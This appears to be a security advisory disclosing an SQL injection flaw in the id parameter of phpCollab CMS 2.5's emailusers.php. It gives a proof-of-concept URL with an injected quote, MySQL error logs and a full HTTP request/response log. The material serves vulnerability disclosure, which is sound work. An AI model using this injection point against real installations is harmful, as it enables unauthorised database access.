phpCollab CMS 2.5 – (emailusers.php) SQL Injection

Request Method(s):
                [+] GET
Vulnerable Module(s):
                [+] ./phpcollab/users/
Vulnerable File(s):
                [+] emailusers.php
Vulnerable Parameter(s):
                [+] id
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5
--- Error Exception Logs [SQL] ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5
Mime Type[text/html]
   Request Header:
      Host[phpcollab.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.;
    _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Server[nginx/1.2.1]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
Reference(s):
http://phpcollab.localhost:8080/
http://phpcollab.localhost:8080/phpcollab/
http://phpcollab.localhost:8080/phpcollab/users/
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php